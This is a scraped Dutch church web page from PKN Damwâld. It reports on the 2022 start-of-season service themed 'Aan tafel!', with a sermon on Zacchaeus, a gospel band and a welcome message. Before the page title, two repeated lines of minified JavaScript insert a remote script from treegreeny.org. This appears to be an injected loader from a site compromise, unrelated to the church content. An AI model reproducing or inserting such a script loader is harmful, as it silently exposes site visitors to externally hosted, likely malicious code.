;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Startdienst 2022 ... aan tafel! ... een heerlijke start! - PKN Damwâld

Startdienst 2022 … aan tafel! … een heerlijke start!

Gepubliceerd op: maandag 12 september 2022

De zomer is voorbij. Werk, school en verenigingen zijn weer van start gegaan. Dan wordt het tijd om elkaar bij te praten! Hoe was je vakantie? Wat heb je voor plannen? Waar kijk je naar uit, of tegenop?

Afgelopen zondag mochten we als Doopsgezinde gemeente en beide PKN-kerken in Damwâld elkaar ontmoeten op de startzondag en maakten we een begin met ons nieuwe jaarthema “Aan tafel!”.  Met z’n allen in de tent van feestvereniging Mei Inoar Ien Damwâld op de parkeerplaats aan de Badhûswei. Een schitterende zonnige dag waarop we samen met een startdienst het nieuwe kerkelijk seizoen mochten inluiden.

Een feestelijke bijeenkomst waarin we Gods gastvrijheid mochten prijzen en ons mochten laten uitdagen door Gods perspectief op de toekomst! Onze eigen gospelband SIGN trakteerde op heerlijke ‘meezingers’ en een perfecte muzikale omlijsting en ook viel er een indrukkende presentatie van Jetse Kooistra en Silke Hanna Peterson van Worldservants Damwoude te bewonderen over de afgelopen projecten in Brazilië en Oeganda.

Ds. G.J. Otter ging in de startdienst in op het Bijbelverhaal over de tollenaar Zacheus. Een tollenaar was iemand die belasting ophaalde namens de Romeinse overheid. Terwijl de omstanders Zacheus zien als een onaanzienlijke, een landverrader en zondaar, let Jezus vooral op de positieve kanten van Zacheus. “Ik weet iets goeds van jou”. Dat was de houding van Jezus ten opzichte van mensen die de fout in gingen. Ons dagelijks nieuws is gebaseerd op “ik weet iets slechts van jou”. Jezus bevestigt Zacheus en die komt tot bekering. Het verhaal van Zacheus laat zien wat een ontmoeting met Jezus kan betekenen in je leven. Dit evangelie mogen wij samen vieren. Want het is Jezus zelf die ons altijd weer uitnodigt en zegt “Ik kom bij jullie aan tafel”. En zetten wij dan ons huis en ons hart open? Durven we van binnenuit met Hem maaltijd te houden?

Aan tafel … na afloop van de dienst was er volop de gelegenheid om elkaar te ontmoeten en werden alle deelnemers verrast met een culinair hoogtepunt … een bijzonder lekker broodje hamburger!

Het werd in de nabijheid van de Here God een gezellig samenzijn, belangrijk om met goede moed te beginnen aan een nieuw seizoen waarin we samen, met elkaar en voor elkaar zullen zorgen.

Van harte welkom

Je bent van harte welkom. Ook…

Als je jezelf niet gelovig noemt…
Als je nog nooit geweest bent…
Als je heel lang niet meer geweest bent…
Als je twijfelt…
Als…

De kerk biedt een plek van rust. Een plek waar je tot jezelf kunt komen en er even niks móet, waar ruimte is voor jouw vragen, voor jouw verhaal.

In de kerk laten we ons inspireren door God en Jezus. Ieder op zijn eigen manier. De één vol overtuiging, de ander misschien wat aarzelend. Hoe dan ook: jouw manier past daar ook tussen.

Want God ziet ook jou! Wij nodigen u en jou van harte uit aan tafel ! (Kijk voor meer info op: gelovendenjeindekerk.nl )